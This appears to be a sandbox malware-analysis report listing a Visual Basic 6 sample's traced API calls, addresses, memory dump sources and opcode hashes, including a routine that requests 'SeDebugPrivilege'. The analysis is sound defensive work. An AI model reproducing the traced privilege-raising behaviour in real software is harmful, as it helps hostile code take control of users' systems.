                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Move$FreeList$ChkstkError
                                                                                                                                                                                  • String ID: RO$Once
                                                                                                                                                                                  • API String ID: 3210543181-275216174
                                                                                                                                                                                  • Opcode ID: 1063fae4adbd8224e8995746d70fbb9a1f5e9435d9e4a9119fec7327904956c2
                                                                                                                                                                                  • Instruction ID: 52c490b129e582bc3dafaca85e5bb0199f8b140a8a0a8e676f0dccd7654b22b4
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1063fae4adbd8224e8995746d70fbb9a1f5e9435d9e4a9119fec7327904956c2
                                                                                                                                                                                  • Instruction Fuzzy Hash: C9413471900208EFD704DF94DE49BEEBBB8FB4C304F108129F916A72A0DB755A44CBA9
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,?,004100E0), ref: 00410C8E
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,00000000,660E6C30,660E0EBE,00000000,004025E6), ref: 00410CBE
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60 ref: 00410CD3
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,00000028,?), ref: 00410CEB
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,00000000,?,0000001C,?,0000001C), ref: 00410D3B
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(?,SeDebugPrivilege,?), ref: 00410D5A
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 00410D6B
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00410D83
                                                                                                                                                                                  • __vbaCopyBytes.MSVBVM60(00000008,?,?), ref: 00410DE0
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?), ref: 00410E35
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Error$System$AnsiBytesChkstkCopyFree
                                                                                                                                                                                  • String ID: SeDebugPrivilege
                                                                                                                                                                                  • API String ID: 1749655604-2896544425
                                                                                                                                                                                  • Opcode ID: f636320db0520c6460c5fd51245f71b2210e99ae5d457a238845d81d681894fc
                                                                                                                                                                                  • Instruction ID: 19430b606137baf8db46125749817fb036df22dc0e74aca3634fbbd968d53a81
                                                                                                                                                                                  • Opcode Fuzzy Hash: f636320db0520c6460c5fd51245f71b2210e99ae5d457a238845d81d681894fc
                                                                                                                                                                                  • Instruction Fuzzy Hash: E3512EB1900308DBDB14DFA1DA09BEEB7B8BB04704F20812EE105BB191D7B85A89DF55
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 00418A2E
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00418A5B
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00418A67
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF), ref: 00418A76
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(?,?,?), ref: 00418A8F
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 00418A9F
                                                                                                                                                                                  • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00418AAD
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00418AB6
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(?,?), ref: 00418ACB
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 00418ADB
                                                                                                                                                                                  • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00418AE9
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00418AF2
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?), ref: 00418B08
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(00418B32), ref: 00418B22
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00418B2B
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$ErrorFree$System$AnsiCopyUnicode$Chkstk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3031735744-0
                                                                                                                                                                                  • Opcode ID: de2cb393b24f7ac5ffc4dd8badd9aec4615ba2a8af61c512e53155f7c5b6804a
                                                                                                                                                                                  • Instruction ID: 31f6dc709dd63b5e7e6354cc984dc1dfaca077b65c72c4c2232904d0b2341183
                                                                                                                                                                                  • Opcode Fuzzy Hash: de2cb393b24f7ac5ffc4dd8badd9aec4615ba2a8af61c512e53155f7c5b6804a
                                                                                                                                                                                  • Instruction Fuzzy Hash: A031FCB5800209EBCB04DFE4DE58ADE7B78FB48315F108559F211B72A0DB756A44CB68
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(660E6C30,660E6A76,00000000), ref: 0040FFAA
                                                                                                                                                                                  • #537.MSVBVM60(00000000,?,00000001), ref: 0040FFBD
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040FFCA
                                                                                                                                                                                  • __vbaInStr.MSVBVM60(00000000,00000000), ref: 0040FFCE
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 0040FFE2
                                                                                                                                                                                  • #537.MSVBVM60(00000000,?,00000001), ref: 0040FFF5
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040FFFC
                                                                                                                                                                                  • __vbaInStr.MSVBVM60(00000000,00000000), ref: 00410001
                                                                                                                                                                                  • #616.MSVBVM60(?,-00000001), ref: 00410011
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0041001C
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00410021
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 0041002D
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(0041005D), ref: 00410056
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60 ref: 00410073
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$FreeMove$#537Copy$#616ErrorOverflow
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3249593964-0
                                                                                                                                                                                  • Opcode ID: 1275576801f9687499aa79f0ee0564375320d38fe15e01250de86d500da99eea
                                                                                                                                                                                  • Instruction ID: 3391faed527fa42239c90739200fcb3ec4dff878199542e7df0cbe2f1190cda9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1275576801f9687499aa79f0ee0564375320d38fe15e01250de86d500da99eea
                                                                                                                                                                                  • Instruction Fuzzy Hash: EC212F71D00109ABCB04DFA5DD89AEFBB78FF59700F10812AE516B72A0DB785945CB98
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000001,00000000,660E6C30,00000000,660E56DE), ref: 0041975B
                                                                                                                                                                                  • __vbaAryLock.MSVBVM60(?,00000000), ref: 00419775
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00419796
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 004197A5
                                                                                                                                                                                  • __vbaAryLock.MSVBVM60(?,?), ref: 004197B2
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 004197CD
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 004197D6
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000,00000000,00000000), ref: 004197F9
                                                                                                                                                                                  • __vbaAryUnlock.MSVBVM60(?), ref: 00419809
                                                                                                                                                                                  • __vbaAryUnlock.MSVBVM60(?), ref: 0041980F
                                                                                                                                                                                  • __vbaPutOwner3.MSVBVM60(00407524,?,00000000), ref: 00419822
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?,0041984F,660E6C30,00000000,660E56DE), ref: 00419848
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60(00000000,660E6C30,00000000,660E56DE), ref: 00419860
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Error$BoundsGenerate$LockUnlock$DestructOverflowOwner3RedimSystem
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3281955820-0
                                                                                                                                                                                  • Opcode ID: ccc3478dbcd7e51189b4f7c35bd8fb3331cd942d6aa921c6006e7f43fcf8eea8
                                                                                                                                                                                  • Instruction ID: 91cd715af1cd97156beb3a758445edf250c8698d8b352ee1a2a14870601594c5
                                                                                                                                                                                  • Opcode Fuzzy Hash: ccc3478dbcd7e51189b4f7c35bd8fb3331cd942d6aa921c6006e7f43fcf8eea8
                                                                                                                                                                                  • Instruction Fuzzy Hash: E0418F75910219AFCB04EFA4CD95AEEB7B9FF48700F14811AE501B7290D7B4AC81CBE9
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(?,004025E6,?,?,?,?,?,?,?,?,004025E6), ref: 0041057E
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 004105AE
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(001F03FF,00000000,00000000,?,?,?,?,004025E6), ref: 004105E8
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000), ref: 00410611
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000), ref: 00410627
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000004,00000000,?,?,?,?,004025E6), ref: 00410645
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,0041B1D4,?,?,?,?,004025E6), ref: 0041067E
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(001F03FF,00000000,00000000,?,?,?,?,004025E6), ref: 004106D3
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000), ref: 004106FC
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000), ref: 00410712
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,0041B1D4,?,?,?,?,004025E6), ref: 00410735
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,004025E6), ref: 00410758
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Error$System$Chkstk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1207130036-0
                                                                                                                                                                                  • Opcode ID: 62ff90cb35de8ef11aa2b30622b115efdf93fef2ebd10f5ae9c3101067cccd5d
                                                                                                                                                                                  • Instruction ID: 2137da7fcd73fff1979705b1bef70d61cd8a95bb74c88752949aaefb45c8b53a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 62ff90cb35de8ef11aa2b30622b115efdf93fef2ebd10f5ae9c3101067cccd5d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C5107B4901208EBDB14DFA4DA48BDEBBB4FF48314F20805AE51477390C7B99A84DF69
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,0040BC66,0041B038,?,?,?,004025E6), ref: 00410E7E
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 00410EAE
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00410EC5
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000,?,?,?,?,00000000,004025E6), ref: 00410ED1
                                                                                                                                                                                  • __vbaStrToUnicode.MSVBVM60(0041B038,?,?,?,?,?,00000000,004025E6), ref: 00410EDF
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 00410EE8
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(?,00000000,00000000,00000000,?,?,?,?,00000000,004025E6), ref: 00410F03
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(?,00000000,00000000,?,?,?,?,00000000,004025E6), ref: 00410F14
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,?,00000000,004025E6), ref: 00410F25
                                                                                                                                                                                  • __vbaStrToUnicode.MSVBVM60(0041B038,?,?,?,?,?,00000000,004025E6), ref: 00410F33
                                                                                                                                                                                  • __vbaStrToUnicode.MSVBVM60(00000000,?,?,?,?,?,00000000,004025E6), ref: 00410F41
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,?,00000000,004025E6), ref: 00410F57
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$AnsiErrorUnicode$FreeSystem$ChkstkList
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3861917509-0
                                                                                                                                                                                  • Opcode ID: c1be402e434711134876b1e75af30f3fda5167bf00b65e5935c09ae6f9679a43
                                                                                                                                                                                  • Instruction ID: d7813b94c935956c428f1e1f47a44fa569b160c913a03527725d119065563702
                                                                                                                                                                                  • Opcode Fuzzy Hash: c1be402e434711134876b1e75af30f3fda5167bf00b65e5935c09ae6f9679a43
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E31ECB5901208EFDB04DFA4DA49BDEBBB8FB48714F108119F515BB290D7B89A44CBA4
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(0040AA6C,004025E6,0040AA6C,?,?,?,00000000,004025E6), ref: 0040FA6E
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,?,?,0040AA6C,004025E6,0040AA6C), ref: 0040FA9E
                                                                                                                                                                                  • #648.MSVBVM60(0000000A), ref: 0040FABD
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 0040FACA
                                                                                                                                                                                  • __vbaFileOpen.MSVBVM60(00000120,000000FF,?), ref: 0040FAE9
                                                                                                                                                                                  • #570.MSVBVM60(?), ref: 0040FAFB
                                                                                                                                                                                  • #525.MSVBVM60(00000000), ref: 0040FB02
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040FB0D
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000000,?,?), ref: 0040FB25
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(?), ref: 0040FB37
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 0040FB4A
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(0040FB7E), ref: 0040FB77
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$FileFree$#525#570#648ChkstkCloseCopyErrorGet3MoveOpen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 947554498-0
                                                                                                                                                                                  • Opcode ID: e9e615465a2034f7d721f361e5a725c75608ada2b2abae78992f9bdf205b699b
                                                                                                                                                                                  • Instruction ID: 2ea1275da5938a61f9bbdbea3727b2d8b601beaa9e21b66b0b90c65097ce1408
                                                                                                                                                                                  • Opcode Fuzzy Hash: e9e615465a2034f7d721f361e5a725c75608ada2b2abae78992f9bdf205b699b
                                                                                                                                                                                  • Instruction Fuzzy Hash: A031ECB5800248EBDB04DFD4DA58BDEBBB4FF08715F208169E511B72A0DB795A44CB64
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(00000000,004025E6), ref: 0040CF8E
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,00000000,004025E6), ref: 0040CFD5
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 0040D006
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406C48,0000004C), ref: 0040D039
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60 ref: 0040D078
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D0C1
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406C48,00000040), ref: 0040D0F9
                                                                                                                                                                                  • __vbaLateIdCall.MSVBVM60(?,60030004,00000000), ref: 0040D11C
                                                                                                                                                                                  • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040D12F
                                                                                                                                                                                  • __vbaCastObj.MSVBVM60(00000000,0040563C), ref: 0040D152
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D15D
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405414,00000730), ref: 0040D190
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60 ref: 0040D1AB
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$CheckFreeHresult$CallCastChkstkErrorLateList
                                                                                                                                                                                  • String ID: ?
                                                                                                                                                                                  • API String ID: 269068952-1684325040
                                                                                                                                                                                  • Opcode ID: 1eafb0bb2cb90cbeb5fe44f42e07e9b228fda82a0d81194327b73e356765a8c2
                                                                                                                                                                                  • Instruction ID: e12f10e6882a07b68982d9b1f0c67d4f52429f3b1a0b66e6b96f65459c310862
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1eafb0bb2cb90cbeb5fe44f42e07e9b228fda82a0d81194327b73e356765a8c2
                                                                                                                                                                                  • Instruction Fuzzy Hash: 06511B75900208EBDB14DFA4C948BDEBBB4FF48704F208269F509BB291D7759A85CF68
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Free$CloseFile$DestructExitProc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1320429144-0
                                                                                                                                                                                  • Opcode ID: e72f65d1b9acbe311dcb925acb13922c15ed09f160c56a860b095a3286b9a039
                                                                                                                                                                                  • Instruction ID: ac45af5dedd4f35385674aac5ef352c541f385de1dfbdc7eb18f47d75152aea7
                                                                                                                                                                                  • Opcode Fuzzy Hash: e72f65d1b9acbe311dcb925acb13922c15ed09f160c56a860b095a3286b9a039
                                                                                                                                                                                  • Instruction Fuzzy Hash: 53F0A471C1416CDBCB08EBA0ED55ADDBB38EF94310F11402AE846B31B49E702E85CEA4
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(?,004025E6), ref: 0040E58E
                                                                                                                                                                                  • __vbaObjSetAddref.MSVBVM60(?,00000000,?,?,?,?,004025E6), ref: 0040E5D4
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040E5E3
                                                                                                                                                                                  • __vbaVarVargNofree.MSVBVM60(?,?,?,?,004025E6), ref: 0040E5F6
                                                                                                                                                                                  • __vbaStrErrVarCopy.MSVBVM60(00000000,?,?,?,?,004025E6), ref: 0040E5FD
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?,?,004025E6), ref: 0040E608
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60 ref: 0040E620
                                                                                                                                                                                  • __vbaRaiseEvent.MSVBVM60(?,00000001,00000001), ref: 0040E646
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,004025E6), ref: 0040E652
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60(0040E67A,?,?,?,?,?,?,004025E6), ref: 0040E673
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$ChkstkFree$AddrefCopyErrorEventMoveNofreeRaiseVarg
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3705209087-0
                                                                                                                                                                                  • Opcode ID: a744b2239620e2a90fce2d31a3f43e904dc0f5ab9ad7dd985c9743abacca18f0
